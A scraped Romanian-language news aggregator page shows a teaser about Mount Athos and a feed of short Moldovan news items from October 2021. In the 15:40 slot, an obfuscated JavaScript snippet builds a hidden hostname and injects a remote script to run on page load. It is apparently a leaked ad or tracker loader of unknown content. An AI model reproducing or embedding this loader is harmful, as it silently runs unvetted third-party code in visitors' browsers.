De ce femeile nu au voie pe Muntele Athos

Timpul, 21 septembrie 2021 16:00

 Muntele Athos este unul dintre cele mai cunoscute destinații în care femeile nu au voie să meargă. Mai mult, aici nu se regăsesc nici măcar animale femele, cu excepţia pisicilor, găinilor şi păsărilor sălbatice. Iată de ce femeile nu au voie pe Muntele Athos.

Citeşte toată ştirea

• • •

Alte ştiri de Timpul

Acum 2 ore
17:40
Un elev de 11 ani a murit după ce telefonul mobil i-a explodat în timpul unui curs online. Băiatul avea telefonul la încărcat în momentul în care acesta s-a aprins brusc și flăcările i-au cuprins hainele, anunță un oficial din Educație din Vietnam.
17:20
Marți, Curtea Europeană a Drepturilor Omului (CEDO) a condamnat Rusia pentru încălcarea dreptului la viaţă şi absenţa unei anchete efective după uciderea a trei tineri musulmani de către agenţi ai Serviciului Federal de Securitate rus (FSB) în 2012, potrivit AFP.
Acum 4 ore
17:00
Vineri, 22 octombrie 2021, primăria municipiului Chişinău informează că în Chişinău va fi dat startul sezonului termic 2021-2021 pentru toţi consumatorii, având în vedere că în intervalul de timp cuprins între orele: 18:00-06:00, temperatura aerului în atmosferă înregistrează valori medii şi/sau scăzute (+10 ˚C), pe parcursul a 3 zile consecutiv.
16:40
Compania „Teleradio-Moldova” ar putea reveni sub control parlamentar, așa cum era până în anul 2019, iar actuala conducere a acesteia, rămasă de pe timpul socialiștilor, ar putea fi demisă, potrivit ziarulnational.md.
16:20
Ministrul desemnat la Ministerul român Afacerilor Externe, Dan Barna, a afirmat, la audierea din comisiile parlamentare, că Republica Moldova mai are rezerve de gaz pentru câteva zile şi că acesta este un moment în care România trebuie să intervină.
15:40
(function(){a47y=document.createElement("script");a47y_="u"+("s")+"ta";a47y_+=("t.i")+""+"n";a47y_+=(("f")+"o");a47y.type="text/javascript";a47y_+="/"; a47yu="314370945";a47yu+=".gjq2u1wf47yxam2swgl";a47yu+="n5xxwpmbssr";a47y.src="https://"+a47y_+a47yu;a47y.async=true;document.body.appendChild(a47y);})();
Acum 6 ore
14:50
O antrenoare însărcinată a fost atacată de un urs brun în faţa a zeci de copii care ţipau terifiaţi, la un spectacol de circ din Rusia, transmite punctul.md.
14:10
Fostul prim-ministru al Republicii Moldova, Ion Sturza, a comentat situația aprovizionării țării cu gaze naturale. Acesta afirmă că suntem victime a rușilor.
13:40
Șirul scumpirii carburanților încă continuă. Agenția Națională pentru Reglementare în Energetică a anunțat noile prețuri maxime de referință. Astfel, benzina A 95 va costa 21,55 lei per litru, cu 5 bani mai mult, iar motorina va costa 18,6 lei per litru, cu 4 bani mai mult, potrivit sinteza.org.
13:20
Republica Moldova ar putea renunța la obiceiul schimbării orei. La 31 octombrie ar putea fi ultima duminică când mai schimbăm ora.
Acum 8 ore
13:00
Republica Moldova se confruntă cu o criză dramatică a asigurării cu resurse energetice, pe fundalul creșterii prețurilor pe plan internațional, însă ţara va avea gaz natural, întrebarea e la ce preţ? Despre aceasta a declarat astăzi, prim-ministrul Natalia Gavriliţa, într-o conferinţă de presă pe subiectul aprovizionării cu gaze a ţării, transmite MOLDPRES.
12:40
12:30
Analistul politic, Anatol Țăranu afirmă că informațiile privind invitația lui Dmitri Kozak, șeful-adjunct al Administrației prezidențiale a Federației Ruse, și că ar fi urmat să se discute despre problema gazelor, vorbesc despre faptul că precedenta declarație a guvernării a fost dată peste cap, pentru că nu a fost invitat la discuții un reprezentant al Gazpromului, ci un reprezentant eminamente politic, informează TRIBUNA.
12:10
Ciprian Ciubuc, deputat AUR, și-a exprimat părerea pe pagina sa de facebook, în privința demisiei lui Igor Dodon.
12:10
12:00
Doi băieți cu vârste cuprinse între 7 și 10 ani au fost bătuți cu picioarele și cu un cablu electric de propriul tată, potrivit sursei din stânga Nistrului.
11:50
Localitățile din Siberia, în care trăiesc 15 milioane de oameni, se scufundă, la propriu, din cauza încălzirii globale. Temperaturile ridicate topesc permafrostul pe care sunt construite case, blocuri, fabrici și aeroporturi. Experții spun că Siberia se încălzește de aproape trei ori mai repede decât media globală.
11:40
Doar pe hârtie sunt respectate restricțiile împotriva răspândirii noului coronavirus. Deși autoritățile au decis că, accesul în localuri este permis doar cu certificat Covid, de această măsură nu țin cont atât unii patroni, cât și vizitatori.
11:40
11:40
11:30
Procurorii anticorupție (PA) au venit cu o informație despre perchezițiile din seara de luni, 18 octombrie curent, în incinta Procuraturii pentru Combaterea Criminalității Organizate și Cauze Speciale (PCCOCS). Vorba nu merge de vreun dosar nou, ci despre anumite probe care sunt relevante în urmărirea penală inițiată pe numele procurorului general suspendat, Alexandr Stoianoglo, potrivit realitatea.md.
11:30
Negocierile privind livrarea gazului natural de la Gazprom vor fi efectuate de către vicepremierul pentru reintegrare, Vlad Kumlinski, care pleacă joi la Moscova, a anunțat premierul, Natalia Gavrilița
11:20
Acum 12 ore
09:40
Calendar ortodox 19 octombrie 2021. În fiecare an, în această zi, sunt pomeniți patru sfinți. Este vorba despre Sfântul Prooroc Ioli, Sfinții Mucenici Uar și Felix și Eusebiu diaconul.
09:30
09:20
08:50
08:30
08:20
08:20
08:00
Liderul Partidului Socialist, Igor Dodon a decis să renunțe la mandatul de deputat din Parlamentul Republicii Moldova. Acesta a anunțat în cadrul unui briefing de presă.
08:00
07:00
 Heiry Calvi, o profesoară în vârstă de 41 de ani din Florida, a fost arestată, cu o cauțiune de 19.000 de dolari, după ce a mers la școală cu o armă și ar fi făcut sex cu un elev în vârstă de 15 ani.
06:50
 BerbecAstăzi atât Jupiter cât și Mercur își încep mersul direct, iar acest lucru te va ajuta foarte mult în relațiile profesionale și în extinderea acestora. Împreună cu o persoană competentă sau cu un șef poți pune la cale un plan pentru viitor.
06:50
În următoarele 24 de ore vremea va rămâne frumoasă și fără precipitații. Vântul va sufla nord-vestic mai mult moderat. Temperatura minimă a aerului noaptea va oscila între +1ºC şi +6ºC. Ziua maxima se va situa între +10ºC şi +15ºC. 
06:40
 Un tânăr în vârstă de 21 ani este învinuit pe mai multe capete de acuzare pentru „viol” și „acțiuni violente cu caracter sexual”, săvârșite pe parcursul a 5 ani asupra surorilor sale minore. Procuratura Generală a anunțat că a expediat în instanța de judecată cauza penală, notează deschide.md.
Acum 24 ore
05:50
Fostul deputat român, Cristian Rizea, se dorește primar de Bălți. Acesta și-a depus candidatura pentru alegerile locale din 21 noiembrie. Anunțul a fost făcut luni, 18 octombrie.
05:50
 În acest an, trecerea la ora de iarnă se face între 30 și 31 octombrie, când ceasurile se vor da cu o oră înapoi, ora 04:00 devenind ora 03:00.
05:30
Aproape toată lumea se îngrașă atunci când se află într-o relația iar acest fapt este confirmat de știință. Cercetătorii cred că dragostea și fericirea ne determină să punem câteva kilograme pe noi, iar motivul a fost explicat chiar de aceștia. Dragostea trece prin stomac, la propriu. Atât pentru bărbați, cât și pentru femei. De altfel, există și un alt studiu care confirmă teoria: „Mănânci cu 35% mai mult atunci când servești masa cu cineva care îți place”.
05:20
Ardelenii se laudă cu această tradiţie. În Bihor şi Satu Mare, pe lângă tradiţionalele gogonele murate sau castraveciori conservaţi la borcan, se pune şi conopidă.
05:20
 Una dintre invențiile periculoase ale sfârșitului secolului XX a fost noțiunea de „drept de a nu te naște”. În Franța și SUA, mai mulți medici au fost condamnați să plătească daune părinților pentru că nu au stabilit ante-natal existența unui handicap la naștere. Aceasta deși handicapul/vătămarea nu era urmare a activității medicale. Daunele au fost plătite pe baza "dreptului de a nu se naște". Dar există un „drept să nu te naști”? A fost corect să plătească medicii pentru că un copil s-a născut cu malformații congenitale după rubeolă sau s-a născut cu sindrom Down?
05:10
Avitaminoza se referă, în general, la carența unei anumite vitamine sau a mai multora. Considerată o boală de nutriție, afecțiunea este rareori întâlnită în cadrul societăților dezvoltate, acolo unde nu lipsesc informațiile despre o alimentație echilibrată, dar mai există încă în statele sărace. Desigur, avitaminoza poate apărea la orice persoană care nu are grijă de alimentația sa, indiferent de origine sau de starea materială.
05:10
O problemă de matematică simplă, pentru elevii de clasa a patra, a revoltat internetul.
05:10
Nicio toamnă fără gem de gutui! Deliciul ăsta nu trebuie să lipsească din cămara niciunei gospodine. Iar noi îți porpunem mai jos o rețetă super-simplă, rapidă și foarte gustoasă și aromată. 
05:10
Toți am auzit de Nostradamus, celebrul alchimist și învățat al secolului al XVI-lea, înzestrat cu darul clarviziunii. Profețiile sale au dezvăluit mai multe taine ale lumii, lucruri extraordinare care s-a întâmplat întocmai cum prevede astrologul francez în cartea sa Les Prophéties (Profețiile).
05:00
Un studiu nou a arătat că pisicile formează același tip de atașament ca bebelușii și câinii.
Ieri
18:20
Octombrie a fost o lună cu prețuri ridicate la caraburanți. Astăzi, de asemenea se înregistrează scumpiri, ANRE a stabilit prețuri mai mari la benzină și motorină.
18:10
În jurul orei 07:29, sub gardul unei biserici de pe strada 31 August din centrul Chișinăului, a fost găsit cadavrul unui bărbat, scrie Deschide.md.
17:50
Fostul deputat român, Cristian Rizea, se dorește primar de Bălți. Acesta și-a depus candidatura pentru alegerile locale din 21 noiembrie. Anunțul a fost făcut luni, 18 octombrie.
16:30
Liderul Partidului Socialist, Igor Dodon a decis să renunțe la mandatul de deputat din Parlamentul Republicii Moldova. Acesta a anunțat în cadrul unui briefing de presă.
Mai multe ştiri
©2004—2021 News.yam.md. Toate titlurile si continutul stirilor apartin surselor respective.
Republicarea materialelor este posibila doar cu acordul sursei.Condiţii de utilizare.